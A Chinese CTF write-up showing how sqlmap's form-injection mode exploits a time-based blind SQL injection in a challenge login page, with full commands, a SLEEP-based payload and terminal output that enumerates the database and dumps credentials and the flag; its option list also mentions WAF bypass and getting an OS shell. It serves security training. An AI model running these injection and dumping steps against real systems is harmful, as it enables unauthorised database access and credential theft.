题解

根据题目提示，应为SQL注入，题目页面只有一个表单，用sqlmap进行表单注入。

使用--forms参数进行自动化表单注入，逐步得到flag。

### 总结参数作用：
-u        指定目标URL。
-C        指定列名（多个列用逗号分隔）。
-D        指定数据库名。
-T        指定表名。
-r        从文件加载请求，保留请求细节，自动识别注入点。
--columns       枚举指定表中的列。
--tables        枚举指定数据库中的表。
--dump          导出数据。
--dbs	        枚举所有数据库	sqlmap -u URL --dbs
--level	        测试深度(1-5)	--level 3（检测Cookie注入）
--risk	        风险等级(1-3)	--risk 3（使用危险语句）
--proxy	        使用代理	--proxy="http://127.0.0.1:8080"
--tamper	    绕过WAF	--tamper=space2comment
--forms         自动处理表单，用于自动发现表单并注入。
--batch         无需用户交互，自动选择默认选项。
--current-db    获取当前数据库名。
--dump-all	    导出所有数据	sqlmap -u URL --dump-all
--os-shell	    获取系统shell	sqlmap -u URL --os-shell

sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch --current-db
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf --tables
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users --columns
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users -C id,password,username --dump

┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch --current-db_____H__                                                          ___ ___[(]_____ ___ ___  {1.9.2#stable}                              
|_ -| . [)]     | .'| . |                                             
|___|_  [']_|_|_|__,|  _|                                             |_|V...       |_|   https://sqlmap.org                          [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:18:50 /2025-07-01/[05:18:50] [INFO] testing connection to the target URL
[05:18:50] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:18:51] [INFO] resuming back-end DBMS 'mysql' 
[05:18:51] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0518am.csv' as the CSV results file in multiple targets mode     
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:18:51] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:18:51] [INFO] fetching current database
[05:18:51] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:18:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[05:19:10] [INFO] adjusting time delay to 1 second due to good response times
qsnctf
current database: 'qsnctf'

┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf --tables_____H__                                                          ___ ___[,]_____ ___ ___  {1.9.2#stable}                              
|_ -| . ["]     | .'| . |                                             
|___|_  [,]_|_|_|__,|  _|                                             |_|V...       |_|   https://sqlmap.org                          [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:27:27 /2025-07-01/[05:27:27] [INFO] testing connection to the target URL
[05:27:27] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:27:28] [INFO] resuming back-end DBMS 'mysql' 
[05:27:28] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0527am.csv' as the CSV results file in multiple targets mode     
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:27:28] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.40, Nginx 1.14.2
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:27:28] [INFO] fetching tables for database: 'qsnctf'
[05:27:28] [INFO] fetching number of tables for database 'qsnctf'
[05:27:28] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:27:31] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[05:27:37] [INFO] retrieved: 
[05:27:47] [INFO] adjusting time delay to 1 second due to good response times
users
Database: qsnctf
[1 table]
+-------+
| users |
+-------+

┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users --columns_____H__                                                          ___ ___["]_____ ___ ___  {1.9.2#stable}                              
|_ -| . ["]     | .'| . |                                             
|___|_  [.]_|_|_|__,|  _|                                             |_|V...       |_|   https://sqlmap.org                          [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:29:34 /2025-07-01/[05:29:34] [INFO] testing connection to the target URL
[05:29:34] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:29:34] [INFO] resuming back-end DBMS 'mysql' 
[05:29:34] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0529am.csv' as the CSV results file in multiple targets mode     
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:29:35] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:29:35] [INFO] fetching columns for table 'users' in database 'qsnctf'                                                                   
[05:29:35] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:29:38] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:29:53] [INFO] adjusting time delay to 1 second due to good response times
3
[05:29:53] [INFO] retrieved: id
[05:30:01] [INFO] retrieved: int(11)
[05:30:32] [INFO] retrieved: username
[05:31:01] [INFO] retrieved: text
[05:31:20] [INFO] retrieved: password
[05:31:53] [INFO] retrieved: text
Database: qsnctf
Table: users
[3 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| id       | int(11) |
| password | text    |
| username | text    |
+----------+---------+

┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users -C id,password,username --dump_____H__                                                          ___ ___[.]_____ ___ ___  {1.9.2#stable}                              
|_ -| . [)]     | .'| . |                                             
|___|_  ["]_|_|_|__,|  _|                                             |_|V...       |_|   https://sqlmap.org                          [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:33:55 /2025-07-01/[05:33:55] [INFO] testing connection to the target URL
[05:33:55] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:33:56] [INFO] resuming back-end DBMS 'mysql' 
[05:33:56] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0533am.csv' as the CSV results file in multiple targets mode     
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:33:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:33:56] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'qsnctf'
[05:33:56] [INFO] fetching number of column(s) 'id,password,username' entries for table 'users' in database 'qsnctf'
[05:33:56] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:33:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[05:34:10] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[05:34:18] [INFO] adjusting time delay to 1 second due to good response times
1
[05:34:20] [INFO] retrieved: 123456
[05:34:41] [INFO] retrieved: admin
[05:34:59] [INFO] retrieved: 2
[05:35:03] [INFO] retrieved: flag{ca74d097080346969f41c257318a7411}
[05:37:45] [INFO] retrieved: user
Database: qsnctf
Table: users
[2 entries]
+----+----------------------------------------+----------+
| id | password                               | username |
+----+----------------------------------------+----------+
| 1  | 123456                                 | admin    |
| 2  | flag{ca74d097080346969f41c257318a7411} | user     |
+----+----------------------------------------+----------+